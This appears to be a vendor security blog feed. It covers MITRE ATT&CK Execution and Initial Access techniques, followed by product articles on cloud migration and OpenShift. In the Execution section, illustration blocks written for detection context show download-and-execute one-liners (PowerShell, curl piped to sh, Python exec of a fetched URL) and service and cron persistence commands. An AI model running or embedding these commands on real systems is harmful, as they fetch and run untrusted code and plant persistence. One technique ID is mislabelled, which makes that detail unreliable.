Distributed Cloud
Overview of MITRE ATT&CK Execution Tactic (TA0002)
Introduction to Execution Tactic (TA0002):

Execution refers to the methods adversaries use to run malicious code on a target system. This tactic covers a range of techniques for executing payloads after access to the network has been gained. It is a key stage in the attack lifecycle because it lets attackers act on their objectives, such as deploying malware, running scripts, or exploiting system vulnerabilities. Successful execution can lead to deeper system control, enabling actions like data theft, system manipulation, or establishing persistence for future exploitation. Now, let's dive into the techniques under the Execution tactic and explore how attackers use them.

1. T1651: Cloud Administration Command
Cloud management services can be exploited to execute commands within virtual machines. If an attacker gains administrative access to a cloud environment, they may misuse these services to run commands on the virtual machines. Furthermore, if an adversary compromises a service provider or a delegated administrator account, they can exploit trusted relationships to execute commands on connected virtual machines.

2. T1059: Command and Scripting Interpreter
The misuse of command and script interpreters allows adversaries to execute commands, scripts, or binaries. These interfaces, such as Unix shells on macOS and Linux, the Windows Command Shell, and PowerShell, are common across platforms and provide direct interaction with systems. Cross-platform interpreters like Python, as well as those tied to client applications (e.g., JavaScript, Visual Basic), can also be misused. Attackers may embed commands and scripts in initial access payloads or download them later via an established C2 (Command and Control) channel. Commands may also be executed via interactive shells or through remote services to enable remote execution.

(.001) PowerShell: Because PowerShell ships with Windows, attackers often exploit it to execute commands discreetly without triggering alarms. It is commonly used for reconnaissance, lateral movement across networks, and running malware directly in memory, which helps avoid detection because nothing is written to disk. Attackers can also execute PowerShell scripts without launching powershell.exe by leveraging .NET interfaces. Tools like Empire, PowerSploit, and PoshC2 make it even easier for attackers to use PowerShell for malicious purposes.
Example: Remote Command Execution

(.002) AppleScript: AppleScript is a macOS scripting language designed to control applications and system components through inter-application messages called AppleEvents. AppleEvent messages can be sent on their own or with AppleScript. They can find open windows, send keystrokes, and interact with almost any open application, either locally or remotely. AppleScript can be executed in various ways, including through the command-line interface (CLI) and built-in applications, but it can also be abused to trigger actions that exploit both the system and the network.

(.003) Windows Command Shell: The Windows Command Prompt (CMD) is a lightweight shell on Windows systems that allows control over most aspects of the system with varying permission levels, though it lacks the advanced capabilities of PowerShell. CMD can also be used remotely via Remote Services. Attackers may use it to execute commands or payloads, often sending input and output through a command-and-control channel.
Example: Remote Command Execution
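As a benign illustration of the remote command execution examples called out above: with PowerShell Remoting (WinRM) enabled, commands can be run on another host, and scripts can be pulled down and executed entirely in memory. The host name and URL below are placeholders.

# Run a command on a remote host over WinRM (PowerShell Remoting)
Invoke-Command -ComputerName SERVER01 -ScriptBlock { whoami }

# The in-memory "download and run" pattern defenders watch for
# (placeholder URL; note that nothing is written to disk)
Invoke-Expression (New-Object Net.WebClient).DownloadString('https://example.com/script.ps1')

Alerting on PowerShell processes that make outbound web requests or use encoded command arguments is a common detection starting point.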
(.004) Unix Shell: Unix shells serve as the primary command-line interface on Unix-based systems. They provide control over nearly all system functions, with certain commands requiring elevated privileges. Unix shells can be used to run commands or payloads directly, and they can also run shell scripts that combine multiple commands as part of an attack.
Example: Remote Command Execution

(.005) Visual Basic: Visual Basic (VB) is a programming language developed by Microsoft, now considered a legacy technology. Visual Basic for Applications (VBA) and VBScript are derivatives of VB. Malicious actors may use VB payloads to execute harmful commands; common attacks include automating actions via VBScript or embedding VBA content (such as macros) in spear-phishing attachments.

(.006) Python: Attackers often use popular scripting languages like Python because of their interoperability, cross-platform support, and ease of use. Python can be run interactively from the command line or through scripts that can be distributed across systems, and it can also be compiled into binary executables. With many built-in libraries for system interaction, such as file operations and device I/O, attackers can leverage Python to download and execute commands and scripts and to perform a variety of other malicious actions.
Example: Code Injection

(.007) JavaScript: JavaScript (JS) is a platform-independent scripting language commonly used in web pages and runtime environments. Microsoft's JScript and JavaScript for Automation (JXA) on macOS are based on JS. Adversaries exploit JS to execute malicious scripts, often through Drive-by Compromise or by downloading scripts as secondary payloads. Since JS is text-based, it is often obfuscated to evade detection.
Example: XSS

(.008) Network Device CLI: Network devices often provide a CLI or scripting interpreter accessible via a direct console connection or remotely through telnet or SSH. These interfaces allow interaction with the device for various functions. Adversaries may exploit them to alter device behavior, manipulate traffic, load malicious software by modifying configurations, or disable security features and logging to avoid detection.

(.009) Cloud API: Cloud APIs offer programmatic access to nearly all aspects of a tenant, available through methods like CLIs, in-browser cloud shells, PowerShell modules (e.g., Azure PowerShell), or SDKs for languages like Python. These APIs provide administrative access to major services. Malicious actors with valid credentials, often stolen, can exploit these APIs to perform malicious actions.

(.010) AutoHotKey & AutoIT: AutoIT and AutoHotkey (AHK) are scripting languages used to automate Windows tasks, such as clicking buttons, entering text, and managing programs. Attackers may exploit AHK (.ahk) and AutoIT (.au3) scripts to execute malicious code, such as payloads or keyloggers. These scripts can also be embedded in phishing payloads or compiled into standalone executable files.

(.011) Lua: Lua is a cross-platform scripting and programming language, primarily designed for embedding in applications. It can be executed via the command line using the standalone Lua interpreter, through scripts (.lua), or within Lua-embedded programs. Adversaries may exploit Lua scripts for malicious purposes, such as abusing or replacing existing Lua interpreters to execute harmful commands at runtime. Malware families developed using Lua include EvilBunny, Line Runner, PoetRAT, and Remsec.
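Across these interpreters, the recurring primitive is the same: fetch code, then run it. In shell and Python form, the pattern looks like the following (placeholder URLs, shown for detection context):

# Classic one-line download-and-execute in a Unix shell
curl -s https://example.com/setup.sh | sh

# The same pattern driven through the Python interpreter
python3 -c "import urllib.request as u; exec(u.urlopen('https://example.com/stage2.py').read())"

Egress filtering and alerting on interpreters that spawn network connections help catch this pattern regardless of the language used.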
(.012) Hypervisor CLI: Hypervisor CLIs offer extensive functionality for managing both the hypervisor and its hosted virtual machines. On ESXi systems, tools like esxcli and vim-cmd allow administrators to configure the system and perform various actions. Attackers may exploit these tools to enable actions like File and Directory Discovery or Data Encrypted for Impact. Malware such as Cheerscrypt and Royal ransomware has leveraged this technique.

3. T1609: Container Administration Command
Adversaries may exploit container administration services, like the Docker daemon, the Kubernetes API server, or the kubelet, to execute commands within containers. In Docker, attackers can specify an entry point to run a script or use docker exec to execute commands in a running container. In Kubernetes, with sufficient permissions, adversaries can gain remote execution by interacting with the API server or the kubelet, or by using commands like kubectl exec within the cluster. (A brief illustration of these administrative commands appears after technique 7 below.)

4. T1610: Deploy Container
Containers can be exploited by attackers to run malicious code or bypass security measures, often through harmful processes or weak settings, such as missing network rules or user restrictions. In Kubernetes environments, attackers may deploy containers with elevated privileges or vulnerabilities to access other containers or the host node. They may also use compromised or seemingly benign images that later download malicious payloads.

5. T1675: ESXi Administration Command
ESXi administration services can be exploited to execute commands on guest machines within an ESXi virtual environment. ESXi-hosted VMs can be remotely managed via persistent background services, such as the VMware Tools Daemon Service. Adversaries can perform malicious activities on VMs by executing commands through SDKs and APIs, enabling follow-on behaviors like File and Directory Discovery, Data from Local System, or OS Credential Dumping.

6. T1203: Exploitation for Client Execution
Adversaries may exploit software vulnerabilities in client applications to execute malicious code. These exploits can target browsers, office applications, or common third-party software. By exploiting specific vulnerabilities, attackers can achieve arbitrary code execution. The most valuable exploits in an offensive toolkit are often those that enable remote code execution, as they provide a pathway into the target system.
Example: Remote Code Execution

7. T1674: Input Injection
Input Injection involves adversaries simulating keystrokes on a victim's computer to carry out actions on their behalf. This can be achieved through several methods, such as emulating keystrokes to execute commands or scripts, or using malicious USB devices to inject keystrokes that trigger scripts or commands. For example, attackers have used malicious USB devices to simulate keystrokes that launch PowerShell, enabling the download and execution of malware from attacker-controlled servers.
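As referenced under technique 3, the administrative commands that adversaries co-opt for container and hypervisor execution are ordinary operator commands. Benign forms look like this (container, pod, and namespace names are placeholders):

# Execute a shell in a running Docker container
docker exec -it mycontainer /bin/sh

# Execute a command in a running Kubernetes pod
kubectl exec -it mypod -n myns -- /bin/sh

# Enumerate VMs on an ESXi host (hypervisor CLI, sub-technique .012)
esxcli vm process list
vim-cmd vmsvc/getallvms

The defensive takeaway is that execution through these paths looks identical to routine administration, so audit logging and least-privilege RBAC matter more than payload signatures.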
8. T1559: Inter-Process Communication
Inter-Process Communication (IPC) is commonly used by processes to share data, exchange messages, or synchronize execution, and it also helps prevent issues like deadlocks. However, IPC mechanisms can be abused by adversaries to execute arbitrary code or commands. The implementation of IPC varies across operating systems. Additionally, command and scripting interpreters may leverage underlying IPC mechanisms, and adversaries might exploit remote services, such as the Distributed Component Object Model (DCOM), to enable remote IPC-based execution.

(.001) Component Object Model (Windows): Component Object Model (COM) is an inter-process communication (IPC) mechanism in the Windows API that allows interaction between software objects. A client object can invoke methods on server objects via COM interfaces. Languages like C, C++, Java, and Visual Basic can be used to exploit COM interfaces for arbitrary code execution. Certain COM objects also support functions such as creating scheduled tasks, enabling fileless execution, and facilitating privilege escalation or persistence.

(.002) Dynamic Data Exchange (Windows): Dynamic Data Exchange (DDE) is a client-server protocol used for one-time or continuous inter-process communication (IPC) between applications. Adversaries can exploit DDE in Microsoft Office documents, either directly or via embedded files, to execute commands without using macros. Similarly, DDE formulas in CSV files can trigger unintended operations. This technique may also be leveraged on compromised systems where direct access to command or scripting interpreters is restricted.

(.003) XPC Services (macOS): macOS uses XPC services for inter-process communication, such as between the XPC Service daemon and privileged helper tools in third-party apps. Applications define the communication protocol used with these services. Adversaries can exploit XPC services to execute malicious code, especially if the app's XPC handler lacks proper client validation or input sanitization, potentially leading to privilege escalation.

9. T1106: Native API
Native APIs provide controlled access to low-level kernel services, including those related to hardware, memory management, and process control. These APIs are used by the operating system during system boot and for routine operations. However, adversaries may abuse native API functions to carry out malicious actions. By using assembly directly or indirectly to invoke system calls, attackers can bypass user-mode security measures such as API hooks. Attackers may also try to alter or disable defensive tools that track API use by removing hooked functions or changing sensor behavior. Many well-known exploit tools and malware families, such as Cobalt Strike, Emotet, Lazarus Group, LockBit 3.0, and Stuxnet, have leveraged Native API techniques to bypass security mechanisms, evade detection, and execute low-level malicious operations.

10. T1053: Scheduled Task/Job
This technique involves adversaries abusing task scheduling features to execute malicious code at specific times or intervals. Task schedulers are available across major operating systems, including Windows, Linux, macOS, and containerized environments, and can also be used to schedule tasks on remote systems. Adversaries commonly use scheduled tasks for persistence, privilege escalation, and to run malicious payloads under the guise of trusted system processes.

(.002) At: The At utility is available on Windows, Linux, and macOS for scheduling tasks to run at specific times. Adversaries can exploit At to execute programs at system startup or on a set schedule, helping them maintain persistence. It can also be misused for remote execution during lateral movement or to run processes under the context of a specific user account. In Linux environments, attackers may use At to break out of restricted environments, aiding privilege escalation.

(.003) Cron: The cron utility is a time-based job scheduler used in Unix-like operating systems. The crontab file contains scheduled tasks and the times at which they should run, and these files are stored in system-specific file paths.
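A crontab entry simply pairs a schedule with a command, so cron-based persistence can look as mundane as the following (paths are illustrative):

# m    h  dom mon dow  command
*/10   *  *   *   *    /usr/local/bin/update-checker.sh
@reboot /home/user/.cache/.helper

Reviewing user and system crontabs for unrecognized entries, especially @reboot lines, is a quick persistence check.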
Adversaries can exploit cron in Linux or Unix environments to execute programs at startup or on a set schedule, maintaining persistence. In ESXi environments, cron jobs must be created directly through the crontab file.

(.005) Scheduled Task: Adversaries can misuse the Windows Task Scheduler to run programs at startup or on a schedule, ensuring persistence. It can also be exploited for remote execution during lateral movement or to run processes under specific accounts (e.g., SYSTEM). Similar to System Binary Proxy Execution, attackers may hide one-time executions under trusted system processes. They can also create "hidden" tasks that are not visible to defender tools or manual queries, and they may alter registry metadata to further conceal these tasks.

(.006) Systemd Timers: Systemd timers are files with a .timer extension used to control services in Linux, serving as an alternative to cron. They can be activated remotely via the systemctl command over SSH. Each .timer file requires a corresponding .service file. Adversaries can exploit systemd timers to run malicious code at startup or on a schedule for persistence. Timers placed in privileged paths can maintain root-level persistence, while user-level timers provide user-level persistence.

(.007) Container Orchestration Job: Container orchestration jobs automate tasks at specific times, similar to cron jobs on Linux. These jobs can be configured to maintain a set number of containers, helping an adversary persist within a cluster. In Kubernetes, a CronJob schedules a Job that runs containers to perform tasks. Adversaries can exploit CronJobs to deploy Jobs that execute malicious code across multiple nodes in a cluster.

11. T1648: Serverless Execution
Cloud providers offer various serverless resources, such as compute functions, integration services, and web-based triggers, that adversaries can exploit to execute arbitrary commands, hijack resources, or deploy functions for further compromise. Cloud events can also trigger these serverless functions, potentially enabling persistent and stealthy execution over time. An example is Pacu, a well-known open-source AWS exploitation framework, which leverages serverless execution techniques.

12. T1229: Shared Modules
Shared modules are executable components loaded into processes to provide access to reusable code, such as custom functions or Native API calls. Adversaries can abuse this mechanism to execute arbitrary payloads by modularizing their malware into shared objects that perform various malicious functions. On Linux and macOS, the module loader can load shared objects from any local path. On Windows, the loader can load DLLs from both local paths and Universal Naming Convention (UNC) network paths.

13. T1072: Software Deployment Tools
Adversaries may exploit centralized management tools to execute commands and move laterally across enterprise networks. Access to endpoint or configuration management platforms can enable remote code execution, data collection, or destructive actions like wiping systems. SaaS-based configuration management tools can extend this control to cloud-hosted instances and on-premises systems, and configuration tools used in network infrastructure devices may be abused in the same way. The level of access required for such activity depends on the system's configuration and security posture.
14. T1569: System Services
System services and daemons can be abused to execute malicious commands or programs, whether locally or remotely. Creating or modifying services allows execution of payloads for persistence, particularly if they are set to run at startup, or for temporary, one-time actions.

(.001) Launchctl (macOS): launchctl interacts with launchd, the service management framework for macOS. It supports running subcommands via the command line, interactively, or from standard input. Adversaries can use launchctl to execute commands and programs as Launch Agents or Launch Daemons, either through scripts or manual commands.

(.002) Service Execution (Windows): The Windows Service Control Manager (services.exe) manages services and is accessible through both the GUI and system utilities. Tools like PsExec and sc.exe can be used for remote execution by specifying remote servers. Adversaries may exploit these tools to execute malicious content by starting new or modified services. This technique is often used for persistence or privilege escalation. (A brief illustration appears at the end of this section.)

(.003) Systemctl (Linux): systemctl is the main interface for systemd, the Linux init system and service manager. It is typically used from a shell but can also be integrated into scripts or applications. Adversaries may exploit systemctl to execute commands or programs as systemd services.

15. T1204: User Execution
Users may be tricked into running malicious code by opening a harmful file or link, often through social engineering. While this usually happens right after initial access, it can occur at other stages of an attack. Adversaries might also deceive users into enabling remote access tools, running malicious scripts, or manually downloading and executing malware. Tech support scams often combine phishing, vishing, and fake websites, with scammers spoofing numbers or setting up fake call centers to steal access or install malware.

(.001) Malicious Link: Users may be tricked into clicking a link that triggers code execution. This can also involve exploiting a browser or application vulnerability (Exploitation for Client Execution). Additionally, links may lead users to download files that, when executed, deliver malware.

(.002) Malicious File: Users may be tricked into opening a file that leads to code execution. Adversaries often use techniques like masquerading and file obfuscation to make files appear legitimate, increasing the chances that users will open and execute them.

(.003) Malicious Image: Cloud images from platforms like AWS, GCP, and Azure, as well as images for popular container runtimes like Docker, can be backdoored. These compromised images may be uploaded to public repositories, and users may unknowingly deploy an instance or container from them, bypassing Initial Access defenses. Adversaries may also use misleading names to increase the chances of users mistakenly deploying the malicious image.

(.004) Malicious Copy and Paste: Users may be deceived into copying and pasting malicious code into a command or scripting interpreter. Malicious websites might display fake error messages or CAPTCHA prompts instructing users to open a terminal or the Windows Run dialog and run arbitrary, often obfuscated commands. Once the commands execute, the adversary gains access to the victim's machine. Phishing emails may also be used to trick users into performing this action.
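As referenced above under Service Execution (.002), creating and starting a Windows service is a single pair of commands, which is what makes it attractive for both administration and abuse. A benign-form illustration (service name and binary path are placeholders; note the required space after each '='):

sc.exe create UpdaterSvc binPath= "C:\Users\Public\payload.exe" start= auto
sc.exe start UpdaterSvc

Services whose binaries live in user-writable paths such as C:\Users\Public are a common hunting signal.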
16. T1047: Windows Management Instrumentation
WMI (Windows Management Instrumentation) provides a standardized way for programs and administrators to manage and access data on Windows systems. It is an administrative feature that allows interaction with system components. Adversaries can exploit WMI to interact with both local and remote systems, using it to gather information for discovery or to execute commands and payloads.

How can F5 help?

F5 security solutions such as WAF (Web Application Firewall), API security, and DDoS mitigation protect applications and APIs across platforms, including cloud, edge, on-premises, and hybrid environments, thereby reducing security risk. F5 bot and risk management solutions can also stop malicious bots and automation, making your modern applications safer. The example attacks mentioned under the techniques above can be effectively mitigated by F5 products such as Distributed Cloud, BIG-IP, and NGINX. Here are a few links that explain the mitigation steps:

Mitigating Cross-Site Scripting (XSS) using F5 Advanced WAF
Mitigating Struts2 RCE using F5 BIG-IP

For more details on the other mitigation techniques for the MITRE ATT&CK Execution tactic (TA0002), please reach out to your local F5 team.

Reference Links:
Execution, Tactic TA0002 - Enterprise | MITRE ATT&CK®
MITRE ATT&CK: What It Is, How it Works, Who Uses It and Why | F5 Labs
Introducing AI Assistant for F5 Distributed Cloud, F5 NGINX One and BIG-IP

This article is an introduction to AI Assistant and shows how it improves SecOps and NetOps speed across all F5 platforms (Distributed Cloud, NGINX One, and BIG-IP) by solving the complexities around configuration, analytics, log interpretation, and scripting.
Overview of MITRE ATT&CK Framework and Initial Access Tactic (TA0001)

Introduction to MITRE ATT&CK:

In today's world, cyber threats are becoming increasingly sophisticated, creating an urgent need for organizations everywhere to understand how adversaries operate so that they can protect their digital assets from being compromised. The MITRE ATT&CK (Adversarial Tactics, Techniques and Common Knowledge) framework is a resource that helps security teams identify and analyze the attack patterns, techniques, and tactics used to achieve exploitation. It is a globally accepted, continually updated, and publicly available framework based on real-world observations of the latest cyber attacks. It tracks APT (Advanced Persistent Threat) groups and TTPs (Tactics, Techniques and Procedures) to provide guidance on the procedures adversaries follow to compromise an organization's resources, and it is widely used in cybersecurity to strengthen organizations' defensive capabilities.

Here are some key terms to be familiar with before we dive deeper:

APT (Advanced Persistent Threat): Advanced groups of cyber attackers, heavily backed and funded to run attack campaigns over long periods of time without being detected.

TTPs (Tactics, Techniques and Procedures):
Tactics: The objective and goal of the attackers.
Techniques: How attackers accomplish their objective.
Sub-Techniques: More granular detail about the implementation of a specific technique.
Procedures: The concrete implementation of techniques or sub-techniques to attain the objective.

The current version of the Enterprise ATT&CK matrix includes 14 tactics, each containing multiple techniques and sub-techniques. Below are the tactics included in the Enterprise matrix with a brief overview of each:

TA0043 Reconnaissance: Gather information about the target.
TA0042 Resource Development: Accumulate and prepare resources to carry out attacks.
TA0001 Initial Access: Infiltrate the target's infrastructure, network, or systems.
TA0002 Execution: Run malicious code on the victim's system.
TA0003 Persistence: Maintain access to the compromised system.
TA0004 Privilege Escalation: Elevate privileges to access more sensitive information.
TA0005 Defense Evasion: Bypass security detections.
TA0006 Credential Access: Steal credentials.
TA0007 Discovery: Learn more about the compromised system's environment.
TA0008 Lateral Movement: Hop to other systems connected to the same network.
TA0009 Collection: Gather sensitive information.
TA0011 Command and Control: Establish remote communication with the compromised system.
TA0010 Exfiltration: Steal data from the compromised system.
TA0040 Impact: Destroy or manipulate data or systems, making them unavailable to the victim.

Introduction to Initial Access Tactic (TA0001):

As the name suggests, initial access means gaining access to the network. The Initial Access tactic covers the techniques adversaries use to gain a foothold and enter a network. This is a crucial phase in the attack lifecycle, as the attacker looks for an entry point into the network. Successful initial access can open the door to a wide range of follow-on exploitation, such as privilege escalation and confidential data theft. Let us now walk through the techniques that fall under Initial Access.
1. Content Injection (T1659): Content Injection is a web application vulnerability in which an attacker manipulates and injects malicious content into a web page through a vulnerable endpoint in the application. Attackers can inject content such as harmful HTML or JavaScript, or alter the existing content of the page, with harmful consequences. Typically, this type of attack is triggered by user interactions (clicking, entering data, submitting a form).
Example: File inclusion or upload

2. Drive-by Compromise (T1189): In a drive-by compromise, the adversary compromises the victim's browser through a malicious or compromised website. Attackers inject malicious code such as malware, ransomware, or exploit kits into the web page, which is then executed automatically when the victim visits the page, without their knowledge or interaction.
Example: Cross-Site Scripting

3. Exploit Public-Facing Applications (T1190): In this technique, attackers exploit vulnerabilities in publicly accessible web applications, web servers, or databases to gain access to a network. Application vulnerabilities, security misconfigurations, inadequate access control mechanisms, and outdated or unpatched software are common enablers of these attacks. Such weaknesses give attackers the opportunity to gain unauthorized access, escalate privileges, or compromise sensitive data.
Example: SQL Injection

4. External Remote Services (T1133): Adversaries enter an organization's network by exploiting weaknesses in external services, such as VPNs, Remote Desktop Protocol (RDP), Citrix, cloud services, and external file sharing, that allow remote access to internal systems. Weak authentication mechanisms, poor access control, VPN misconfiguration, and insecure connections pave the way for this type of attack.

5. Hardware Additions (T1200): In this technique, the attacker compromises the target system or network by connecting new hardware, networking devices, or other computing devices. Attackers can use USB keyloggers to capture keystrokes and steal credentials, or use routers, switches, passive network taps, or traffic-modifying devices to intercept or control networks. Because this technique involves physical hardware, it can give the attacker persistent access even when software defenses are intact.

6. Phishing (T1566): Phishing is a technique in which attackers target an individual or organization with deceptive emails, texts, or files that appear to come from trusted, legitimate sources. Attackers craft the content to trick users into clicking malicious links, downloading attachments, or revealing sensitive information such as usernames, passwords, or financial details. A more targeted form of phishing is called spearphishing.

(.001) Spearphishing Attachment: The attacker sends an email or text with malicious files attached, such as executables, PDFs, or Word documents. When a user opens or downloads an attachment, a malicious payload is executed on the system.

(.002) Spearphishing Link: Adversaries send emails or texts containing malicious links that look legitimate. When a user clicks the link, or copies and pastes the URL into a browser, malicious content may be downloaded to the system, or the user may be tricked into entering personal information such as credentials, bank details, or unique identity numbers.
(.003) Spearphishing via Service: Adversaries use third-party online services or platforms, such as social media or personal webmail, as the channel for their phishing attack.

(.004) Spearphishing Voice: The attacker compromises a victim through voice communication. The attacker pretends to be a person from a trusted organization, such as a bank or a government office, and tricks the victim into revealing sensitive information over the phone.

7. Replication Through Removable Media (T1091): Adversaries use removable media, such as USB drives and external hard disks, to spread malicious payloads and replicate malware between systems. Malicious code may execute automatically when the device is plugged in, if autoplay or autorun is enabled on the system, or the attacker may rely on user interaction to run the payload.

8. Supply Chain Compromise (T1195): In a supply chain compromise, an adversary targets and compromises a company's supply chain, such as suppliers, vendors, or third-party service providers, before products reach the end customer. Attackers can introduce malicious elements into software updates, hardware, or dependencies before delivery.

(.001) Compromise Software Dependencies and Development Tools: The adversary manipulates third-party open-source software, development tools, or service providers used by the organization.

(.002) Compromise Software Supply Chain: The attacker manipulates software updates, libraries, or distribution repositories before the software reaches the final customer. The compromised update is then unknowingly installed by the organization when it updates or installs the software.

(.003) Compromise Hardware Supply Chain: The attacker manipulates hardware components or devices before they reach the end user. Once installed within an organization, the tampered device provides a persistent backdoor for attackers.
Example: Insecure Deserialization, Log4j

9. Trusted Relationship (T1199): Adversaries exploit the relationship between the target organization and its partners, vendors, or internal users to gain access. Adversaries target these trusted entities and use them as attack vectors because they are typically subject to less stringent scrutiny and may have elevated permissions to critical systems within the target organization.
Example: Unsafe Consumption of APIs

10. Valid Accounts (T1078): The Valid Accounts technique is one of the most common methods adversaries use to gain unauthorized access to systems, by exploiting legitimate credentials. Attackers use stolen credentials or guessed passwords to access systems; compromised or weak credentials can bypass security mechanisms and provide persistent, privileged access.
Example: Brute Force

(.001) Default Accounts: Adversaries exploit the credentials of default accounts such as Guest or Administrator. Default accounts also include factory- or provider-set accounts on other types of systems, software, or devices, including the root user account in AWS and the default service account in Kubernetes. Failing to change the credentials of default accounts exposes the organization to significant security risk.
(.002) Domain Accounts: Adversaries exploit user or system credentials that are part of a domain. Domain accounts are managed by Active Directory Domain Services, where access and permissions are set across systems and services within the domain.

(.003) Local Accounts: Adversaries exploit the credentials of local accounts. Local accounts are typically configured by an organization for use by users, remote support services, or administrative tasks on individual systems or services.

(.004) Cloud Accounts: Adversaries exploit valid credentials of cloud accounts to access cloud-based services and infrastructure. As organizations increasingly rely on cloud environments such as Amazon Web Services (AWS), Microsoft Azure, and Google Cloud, adversaries target cloud accounts to exploit resources, steal data, or perform further malicious activities within the cloud environment.

How can F5 help?

F5 security solutions such as WAF (Web Application Firewall), API security, and DDoS mitigation protect applications and APIs across platforms, including cloud, edge, on-premises, and hybrid environments, thereby reducing security risk. In addition, F5 bot and risk management solutions effectively mitigate malicious bots and automation, enhancing the security posture of your modern applications. The example attacks mentioned under the techniques above can be effectively mitigated by F5 products such as Distributed Cloud, BIG-IP, and NGINX. Here are a few links that explain the mitigation steps:

Mitigating Cross-Site Scripting (XSS) using F5 Advanced WAF
Mitigating Injection flaws using F5 Distributed Cloud
Mitigating Log4j vulnerability using F5 Distributed Cloud
Mitigating SQL injection using F5 NGINX App Protect

For more details on the other mitigation techniques for the MITRE ATT&CK Initial Access tactic (TA0001), please reach out to your local F5 team.

NOTE: This is the first article in the MITRE series; stay tuned for more tactics-related articles.

Reference Links:
Initial Access, Tactic TA0001 - Enterprise | MITRE ATT&CK®
MITRE ATT&CK: What It Is, How it Works, Who Uses It and Why | F5 Labs
Secure and Seamless Cloud Application Migration with F5 Distributed Cloud and Nutanix

Introduction

F5 Distributed Cloud (XC) offers SaaS-based security, networking, and application management services for multicloud environments, on-premises infrastructures, and edge locations. F5 Distributed Cloud Services Customer Edge (CE) enhances these capabilities by integrating into a customer's environment, enabling centralized management via the F5 Distributed Cloud Console while being fully operated by the customer. The Customer Edge can be deployed in public clouds, on-premises, or at the edge.

Nutanix is a leading provider of hyperconverged infrastructure (HCI), which integrates storage, compute, networking, and virtualization into a unified, scalable, and easily managed solution. Nutanix Cloud Clusters (NC2) extend on-premises data centers to public clouds while maintaining the simplicity of the Nutanix software stack and a unified management console. NC2 runs AOS and AHV on public cloud instances, offering the same CLI, user interface, and APIs as on-premises environments.

This article explores how F5 Distributed Cloud and Nutanix work together to deliver secure and seamless application services across various types of cloud application migration. Whether migrating applications to the cloud, repatriating them from public clouds, or transitioning into a hybrid multicloud environment, F5 Distributed Cloud and Nutanix ensure optimal performance and security throughout.

Illustration

F5 Distributed Cloud App Connect securely connects distributed application services across hybrid and multicloud environments. It operates seamlessly with a platform of web application and API protection (WAAP) services, safeguarding apps and APIs against a wide range of threats through robust security policies, including an integrated WAF, DDoS protection, bot management, and other security tools. This allows consistent, comprehensive security policies to be enforced across all applications without configuring individual custom policies for each app and environment. It also provides centralized observability, with clear insight into performance metrics, security posture, and operational status across all cloud platforms. In this section, we illustrate how to use F5 Distributed Cloud App Connect with Nutanix in different cloud application migration scenarios.

Cloud Migration

In our example, we have a VMware environment in a data center located in San Jose. Our goal is to migrate the on-premises application nutanix.f5-demo.com from the VMware environment to a multicloud environment by distributing the application workloads across Nutanix Cloud Clusters (NC2) on AWS and Nutanix Cloud Clusters (NC2) on Azure.

First, we deploy F5 Distributed Cloud Customer Edge (CE) and application workloads on NC2 on AWS as well as on NC2 on Azure. F5 Distributed Cloud App Connect addresses the issue of IP overlap, enabling us to deploy application workloads using the same IP addresses as those in the VMware environment in the San Jose data center.

Next, we create origin pools on the F5 Distributed Cloud Console. In our example, we create two origin pools: nutanix-nc2-aws-pool for origin servers on NC2 on AWS and nutanix-nc2-azure-pool for origin servers on NC2 on Azure.
To minimize disruption to the application service, we update the HTTP Load Balancer for nutanix.f5-demo.com to include both new origin pools, assigning them a higher weight than the existing pool vmware-sj-pool so that the origin servers on NC2 on AWS and NC2 on Azure receive more traffic than the origin servers in the VMware environment in the San Jose data center. Note that the web application firewall (WAF) nutanix-demo is enabled. Finally, we remove vmware-sj-pool to complete the cloud migration.

Cloud Repatriation

In this example, xc.f5-demo.com is deployed in a multicloud environment across AWS and Azure. Our objective is to migrate the application back from the public clouds to the Nutanix environment in the San Jose data center.

To begin, we deploy F5 Distributed Cloud Customer Edge (CE) and application workloads on Nutanix AHV. We deploy the application workloads using the same IP addresses as those in the public clouds, because IP overlap is not a concern with F5 Distributed Cloud App Connect. On the F5 Distributed Cloud Console, we create an origin pool, nutanix-sj-pool, with origin servers in the Nutanix environment in the San Jose data center.

We then update the HTTP Load Balancer for xc.f5-demo.com to include the new origin pool, assigning it a higher weight than the two existing pools: xc-aws-pool, with origin servers on AWS, and xc-azure-pool, with origin servers on Azure. As a result, the origin servers in the Nutanix environment in the San Jose data center receive more traffic than the origin servers in the other pools. To ensure all applications receive the same level of protection, the web application firewall (WAF) nutanix-demo is applied here as well. To complete the cloud repatriation, we remove xc-aws-pool and xc-azure-pool. The application service experiences minimal disruption during and after the migration.

Hybrid Multicloud

Our goal in this example is to bring xc-nutanix.f5-demo.com, presently deployed solely in the San Jose data center, into a hybrid multicloud environment. We first deploy F5 Distributed Cloud Customer Edge (CE) and application workloads on NC2 on AWS as well as on NC2 on Azure. On the F5 Distributed Cloud Console, we create an origin pool with origin servers for each of the CE sites. Next, we update the HTTP Load Balancer for xc-nutanix.f5-demo.com so that it includes all origin pools: nutanix-sj-pool (Nutanix AHV in our San Jose data center), nutanix-nc2-aws-pool (NC2 on AWS), and nutanix-nc2-azure-pool (NC2 on Azure). The web application firewall (WAF) nutanix-demo is applied here as well, ensuring a consistent level of protection across all applications no matter where they are deployed. xc-nutanix.f5-demo.com is now in a hybrid multicloud environment.

The F5 Distributed Cloud Console is the centralized console for configuration management and observability. It provides real-time metrics and analytics, which allows us to proactively monitor security events. Its integrated AI assistant delivers real-time insights and actionable recommendations for security events, improving our understanding of them and enabling more informed decision-making. This allows us to swiftly detect and respond to emerging threats and sustain a robust security posture.
Conclusion

Cloud application migration can be complex and challenging. F5 Distributed Cloud and Nutanix together offer a secure and streamlined solution that minimizes risk and disruption during and after the migration process, including for those migrating from VMware environments. This ensures a seamless cloud application transition while maintaining business continuity throughout the entire process and beyond.
Deploying F5 Distributed Cloud Customer Edge in Red Hat OpenShift Virtualization

Introduction

Red Hat OpenShift Virtualization is a feature that brings virtual machine (VM) workloads into the Kubernetes platform, allowing them to run alongside containerized applications in a seamless, unified environment. Built on the open-source KubeVirt project, OpenShift Virtualization enables organizations to manage VMs using the same tools and workflows they use for containers.

Why OpenShift Virtualization?

Organizations today face critical needs such as:

Rapid Migration: "I want to migrate ASAP" from traditional virtualization platforms to more modern solutions.
Infrastructure Modernization: Transitioning legacy VM environments to leverage the benefits of hybrid and cloud-native architectures.
Unified Management: Running VMs alongside containerized applications to simplify operations and improve resource utilization.

OpenShift Virtualization addresses these challenges by consolidating legacy and cloud-native workloads onto a single platform. This consolidation simplifies management, improves operational efficiency, and enables infrastructure modernization without disrupting existing services.

